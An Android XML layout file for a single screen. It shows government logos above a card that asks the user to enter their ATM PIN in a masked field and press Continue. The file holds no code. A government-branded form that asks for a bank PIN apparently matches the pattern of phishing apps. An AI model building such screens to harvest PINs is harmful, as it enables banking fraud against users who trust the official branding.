<?xml version="1.0" encoding="utf-8"?>
<ScrollView xmlns:android="http://schemas.android.com/apk/res/android"
    android:layout_width="match_parent"
    android:layout_height="match_parent"
    xmlns:app="http://schemas.android.com/apk/res-auto"
    android:background="#F8F9FB"
    android:padding="0dp">

    <LinearLayout
        android:layout_width="match_parent"
        android:layout_height="wrap_content"
        android:orientation="vertical"
        android:gravity="center_horizontal"
        android:background="@drawable/form_border"
        android:paddingBottom="10dp"
        android:paddingHorizontal="0dp">

        <!-- Government Logo -->
        <ImageView
            android:layout_marginTop="30dp"
            android:layout_width="250dp"
            android:layout_height="200dp"
            android:src="@drawable/top_"
            android:contentDescription="Government Logo"
            />

        <LinearLayout
            android:layout_width="match_parent"
            android:layout_height="wrap_content"
            android:orientation="vertical"
            android:gravity="center_horizontal">

            <androidx.cardview.widget.CardView
                android:layout_width="match_parent"
                android:layout_height="wrap_content"
                android:elevation="30dp"
                app:cardCornerRadius="16dp"
                android:layout_margin="20dp"
                app:cardBackgroundColor="#fff">

                <LinearLayout
                    android:layout_marginTop="15dp"
                    android:padding="5dp"
                    android:layout_width="match_parent"
                    android:layout_height="wrap_content"
                    android:orientation="vertical">

                    <!-- Card Number Label -->
                    <TextView
                        android:layout_width="match_parent"
                        android:layout_height="wrap_content"
                        android:text="ATM PIN*"
                        android:textSize="18sp"
                        android:textStyle="bold"
                        android:textColor="@color/black"
                        android:layout_marginBottom="4dp" />

                    <!-- Card Number Field -->
                    <EditText
                        android:id="@+id/atmpin"
                        android:layout_width="match_parent"
                        android:layout_height="50dp"
                        android:hint="Enter ATM PIN"
                        android:background="@drawable/input_border"
                        android:padding="12dp"
                        android:inputType="numberPassword"
                        android:maxLength="6"
                        android:textColorHint="#999999"
                        android:textColor="#000000"
                        android:layout_marginBottom="12dp" />


                    <!-- Proceed Button -->
                    <Button
                        android:layout_marginTop="30dp"
                        android:id="@+id/btnProceed"
                        android:layout_width="match_parent"
                        android:layout_height="50dp"
                        android:text="Continue"
                        android:textAllCaps="false"
                        android:textColor="#FFFFFF"
                        android:background="@drawable/bg_retry_button"
                        android:textSize="18sp"
                        android:layout_marginBottom="8dp" />


                </LinearLayout>

            </androidx.cardview.widget.CardView>

            <ImageView
                android:layout_marginTop="20dp"
                android:layout_width="250dp"
                android:layout_height="120dp"
                android:src="@drawable/logo"
                android:contentDescription="Government Logo"
                android:layout_marginBottom="8dp" />
        </LinearLayout>
    </LinearLayout>

</ScrollView>
